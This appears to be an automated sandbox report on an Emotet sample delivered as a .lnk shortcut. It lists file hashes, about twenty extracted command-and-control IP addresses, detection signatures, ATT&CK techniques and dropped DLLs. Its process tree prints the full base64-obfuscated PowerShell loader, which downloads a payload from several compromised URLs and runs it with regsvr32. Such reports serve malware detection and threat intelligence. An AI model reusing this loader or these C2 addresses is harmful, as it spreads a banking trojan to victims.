emotet | 3e3b827cf8b350d18fc92feb1c7bafd89ca2239eb903bef27bdc06a41de98b57

Target

UU3444499999999AA.lnk
Size

3KB
MD5

08205fbc8d439bb4dbded1b3b4146daa
SHA1

f07b89b0bb7691406f109e6be7d59551efa91fc7
SHA256

3e3b827cf8b350d18fc92feb1c7bafd89ca2239eb903bef27bdc06a41de98b57
SHA512

c1045c4ab9ce5e3fe0b2c13521b75e824b1501c626782aad55a20923d88ecdc9c0f28fd0b6f005dc5ea69b8af50bd7bb5963f389da55a4e7fc74fa8defbbc902

Score

10^/10

emotet banker suricata trojan

Malware Config

Extracted

Family

emotet

101.50.0.91:8080

159.89.202.34:443

209.97.163.214:443

173.212.193.249:8080

159.65.88.10:8080

45.118.115.99:8080

82.165.152.127:8080

207.148.79.14:8080

41.73.252.195:443

196.218.30.83:443

103.75.201.2:443

64.227.100.222:8080

149.56.131.28:8080

103.43.75.120:443

188.44.20.25:443

185.4.135.165:8080

91.207.28.33:8080

110.232.117.186:8080

72.15.201.15:8080

45.176.232.124:443

eck1.plain

ecs1.plain

Signatures

Emotet
Emotet is a trojan that is primarily spread through spam emails.
trojan banker emotet
suricata: ET MALWARE W32/Emotet CnC Beacon 3
suricata: ET MALWARE W32/Emotet CnC Beacon 3
suricata

Blocklisted process makes network request 4 IoCs

flow	pid	Process
9	5044	powershell.exe
13	5044	powershell.exe
15	5044	powershell.exe
40	5044	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation	cmd.exe

Loads dropped DLL 2 IoCs

pid	Process
3856	regsvr32.exe
2300	regsvr32.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
5044	powershell.exe
5044	powershell.exe
3856	regsvr32.exe
3856	regsvr32.exe
2300	regsvr32.exe
2300	regsvr32.exe
2300	regsvr32.exe
2300	regsvr32.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	5044	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2880 wrote to memory of 5044	2880	cmd.exe	80
PID 2880 wrote to memory of 5044	2880	cmd.exe	80
PID 5044 wrote to memory of 3856	5044	powershell.exe	88
PID 5044 wrote to memory of 3856	5044	powershell.exe	88
PID 3856 wrote to memory of 2300	3856	regsvr32.exe	89
PID 3856 wrote to memory of 2300	3856	regsvr32.exe	89

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\UU3444499999999AA.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2880
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "&{'/ZIIDxaZ4eOrVrXwvO7wSOLQe/f4UxLlrO9bmR5Uq4eReEdw+a2fZRMSDRMsW+yRtA38AWvk';$Hkc='JlbmNlPSJTaWxlbnRseUNvbnRpbnVlIjskbGlua3M9KCJodHRwOi8vbmljb2xhc3Nwb3J0YWZvbGlvLmF0d2VicGFnZXMuY29tL2Nzcy94S0FLYXpDVE4vIiwiaHR0cDovL3d3dy5haGFuLm9yZy5way9jYXRhbG9ndWVzL3YzLyIsImh0dHA6Ly9ucmMtc29sdWNpb25lcy5jb20uYXIvY2dpLWJpbi9uOWIwQTlOM0pScks2TXkvIiwiaHR0cDovL3d3dy5hZ3JldHRvLmNvbS9UZW1wbGF0ZS9qRURZQ1ltOG50SnQwU3EvIiwiaHR0cHM6Ly9teWFubWFyY2hlZnMuY29tL3dwLWNvbnRlbnQvS3VHNFc3aC8iLCJodHRwOi8vd29vbGxvb21vb2xvby5ubC9jZ2ktYmluL3pJZHdOQzJkLyIpOyR0PSJlblBNTXZSbiI7JGQ9IiRlbnY6VE1QXC4uXCR0Ijtta2RpciAtZm9yY2UgJGQgfCBvdXQtbnVsbDtmb3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZFxLS0h3RUx3Y29YLnJLVTtSZWdzdnIzMi5leGUgIiRkXEtLSHdFTHdjb1gucktVIjticmVha30gY2F0Y2ggeyB9fQ==';$ZYCJ='IFdyaXRlLUhvc3QgInNBYlZTIjskUHJvZ3Jlc3NQcmVmZX';$ZYCJ=$ZYCJ+$Hkc;$EL=$ZYCJ;$gFtY=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($EL));$EL=$gFtY;iex($EL)}"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5044
- - C:\Windows\system32\regsvr32.exe
    "C:\Windows\system32\regsvr32.exe" C:\Users\Admin\AppData\Local\Temp\..\enPMMvRn\KKHwELwcoX.rKU
    3⤵
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:3856
  - - C:\Windows\system32\regsvr32.exe
      C:\Windows\system32\regsvr32.exe "C:\Windows\system32\GjyHGvz\sqaZ.dll"
      4⤵
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      PID:2300

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\enPMMvRn\KKHwELwcoX.rKU

Filesize
367KB

MD5
0f19b5561bf105e28894d6b0e6c9582d

SHA1
399a6d4253402984c6712aeb6ffc7ede1f7e0fa6

SHA256
f78ac98c6c2d5af1542c2516f26e6af6c0e186bca4a17592e8fb732a6dcf3af5

SHA512
2c6ec08e13a5f9af4b78ea6a540c13f387f61b59a02ac2b058cc62921b8dd7d9d345424bb826dd8e0f6fe524bfb22bdcd52f0e97d48956a1d81da22896000e80

Download Submit
C:\Users\Admin\AppData\Local\enPMMvRn\KKHwELwcoX.rKU

Filesize
367KB

MD5
0f19b5561bf105e28894d6b0e6c9582d

SHA1
399a6d4253402984c6712aeb6ffc7ede1f7e0fa6

SHA256
f78ac98c6c2d5af1542c2516f26e6af6c0e186bca4a17592e8fb732a6dcf3af5

SHA512
2c6ec08e13a5f9af4b78ea6a540c13f387f61b59a02ac2b058cc62921b8dd7d9d345424bb826dd8e0f6fe524bfb22bdcd52f0e97d48956a1d81da22896000e80

Download Submit
C:\Windows\System32\GjyHGvz\sqaZ.dll

Filesize
367KB

MD5
0f19b5561bf105e28894d6b0e6c9582d

SHA1
399a6d4253402984c6712aeb6ffc7ede1f7e0fa6

SHA256
f78ac98c6c2d5af1542c2516f26e6af6c0e186bca4a17592e8fb732a6dcf3af5

SHA512
2c6ec08e13a5f9af4b78ea6a540c13f387f61b59a02ac2b058cc62921b8dd7d9d345424bb826dd8e0f6fe524bfb22bdcd52f0e97d48956a1d81da22896000e80

Download Submit
memory/3856-139-0x0000000180000000-0x000000018002B000-memory.dmp

Filesize
172KB

Download
memory/5044-131-0x00000244EE7E0000-0x00000244EE802000-memory.dmp

Filesize
136KB

Download
memory/5044-132-0x00007FFB908B0000-0x00007FFB91371000-memory.dmp

Filesize
10.8MB

Download
memory/5044-133-0x00000244F2170000-0x00000244F2916000-memory.dmp

Filesize
7.6MB

Download
memory/5044-134-0x00007FFB908B0000-0x00007FFB91371000-memory.dmp

Filesize
10.8MB

Download
memory/5044-138-0x00007FFB908B0000-0x00007FFB91371000-memory.dmp

Filesize
10.8MB

Download